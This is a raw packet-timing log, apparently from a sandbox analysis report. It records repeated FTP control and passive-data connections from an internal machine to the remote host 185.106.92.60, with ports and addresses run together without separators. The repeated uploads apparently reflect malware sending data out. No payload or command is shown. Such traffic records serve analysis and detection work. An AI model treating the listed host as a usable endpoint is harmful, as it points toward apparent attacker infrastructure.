                                                                                                                                    Oct 10, 2022 06:02:56.295053959 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.295188904 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.317660093 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.317812920 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.317969084 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.341110945 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.341234922 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.341396093 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.364039898 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.364162922 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.364304066 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.387290001 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.387382030 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.388118982 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.410604000 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.410753012 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.411843061 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.434767008 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.434968948 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.435740948 CEST4985864601192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.458739996 CEST6460149858185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.458884954 CEST4985864601192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.459110022 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.482399940 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.482614994 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.483536959 CEST4985864601192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.506205082 CEST6460149858185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.506609917 CEST6460149858185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.506720066 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.506733894 CEST4985864601192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.506814957 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.506995916 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.529391050 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.529459000 CEST2149857185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.529663086 CEST4985721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.654854059 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.677546978 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.677787066 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.703469992 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.703542948 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.703576088 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.703716993 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.703860998 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.704955101 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.727722883 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.727843046 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.727978945 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.750894070 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.751063108 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.751211882 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.774190903 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.774583101 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.774935961 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.797852993 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.798171043 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.798540115 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.821398973 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.821706057 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.823256016 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.846549034 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.846842051 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.847028017 CEST4986064602192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.869611979 CEST6460249860185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.869852066 CEST4986064602192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.870110989 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.893452883 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.893729925 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.896950006 CEST4986064602192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.919401884 CEST6460249860185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.919595003 CEST6460249860185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.919809103 CEST4986064602192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.920115948 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.920224905 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.920557976 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:56.943056107 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.943104982 CEST2149859185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:56.943416119 CEST4985921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.056721926 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.082163095 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.082336903 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.111726999 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.111778975 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.111812115 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.111898899 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.111900091 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.112091064 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.137326002 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.137482882 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.137670994 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.161978960 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.162132025 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.162302971 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.187696934 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.187844992 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.188211918 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.214741945 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.214905024 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.215651989 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.240606070 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.240767956 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.241755962 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.267173052 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.267338037 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.268424988 CEST4986264603192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.292663097 CEST6460349862185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.292776108 CEST4986264603192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.293426991 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.318372965 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.318546057 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.320823908 CEST4986264603192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.344726086 CEST6460349862185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.344829082 CEST6460349862185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.344949007 CEST4986264603192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.345024109 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.345154047 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.347598076 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.372775078 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.372865915 CEST2149861185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.372951031 CEST4986121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.500106096 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.526212931 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.526333094 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.555188894 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.555217028 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.555229902 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.555358887 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.555358887 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.555572033 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.580475092 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.580642939 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.580760956 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.605945110 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.606055975 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.606211901 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.630089998 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.632415056 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.634424925 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.660248041 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.662421942 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.665146112 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.689852953 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.691196918 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.692255974 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.717794895 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.718558073 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.719150066 CEST4986464605192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.744259119 CEST6460549864185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.744743109 CEST4986464605192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.745019913 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.770200968 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.772202015 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.777292967 CEST4986464605192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.800381899 CEST6460549864185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.800431013 CEST6460549864185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.800569057 CEST4986464605192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.800895929 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.801058054 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.801198959 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.825057030 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.825082064 CEST2149863185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:57.825225115 CEST4986321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:57.979350090 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.002731085 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.002928972 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.029794931 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.029844999 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.029869080 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.029994965 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.030064106 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.030273914 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.053498030 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.057456970 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.057570934 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.081146002 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.081548929 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.081790924 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.105508089 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.105734110 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.105854034 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.129446030 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.133848906 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.134462118 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.157540083 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.157773018 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.158708096 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.182291985 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.183572054 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.185050964 CEST4986664606192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.209080935 CEST6460649866185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.209187984 CEST4986664606192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.209508896 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.233377934 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.238301039 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.238725901 CEST4986664606192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.262397051 CEST6460649866185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.262465000 CEST6460649866185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.262571096 CEST4986664606192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.263531923 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.265845060 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.266232967 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.289119005 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.289184093 CEST2149865185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.289397955 CEST4986521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.415482998 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.442516088 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.442667007 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.472251892 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.472305059 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.472341061 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.472390890 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.472429991 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.472429991 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.472610950 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.498537064 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.502554893 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.502672911 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.531125069 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.531308889 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.531421900 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.558778048 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.559465885 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.559621096 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.588268042 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.590513945 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.591434002 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.619088888 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.622493029 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.623374939 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.651138067 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.654473066 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.654624939 CEST4986864607192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.678759098 CEST6460749868185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.678915977 CEST4986864607192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.679163933 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.706285954 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.710412025 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.710896969 CEST4986864607192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.734718084 CEST6460749868185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.734906912 CEST6460749868185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.735040903 CEST4986864607192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.737317085 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.737427950 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.739098072 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.764894009 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.764967918 CEST2149867185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.765151978 CEST4986721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.892450094 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.915684938 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.915792942 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.942009926 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.942068100 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.942100048 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.942159891 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.942188025 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.942466021 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.965567112 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.970243931 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.970350027 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.993938923 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:58.994124889 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:58.994434118 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.017533064 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.017678976 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.017818928 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.041584015 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.041707039 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.042128086 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.065479040 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.065792084 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.074343920 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.098316908 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.101984978 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.102298975 CEST4987064608192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.129101038 CEST6460849870185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.129446983 CEST4987064608192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.129528999 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.156347990 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.158471107 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.159106016 CEST4987064608192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.184814930 CEST6460849870185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.184875965 CEST6460849870185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.185183048 CEST4987064608192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.185509920 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.185889959 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.192647934 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.215805054 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.215877056 CEST2149869185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.216031075 CEST4986921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.337821007 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.362783909 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.362906933 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.389720917 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.389877081 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.389947891 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.390199900 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.390201092 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.390661955 CEST4987121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:59.414158106 CEST2149871185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:59.414572001 CEST4987121192.168.2.3185.106.92.60
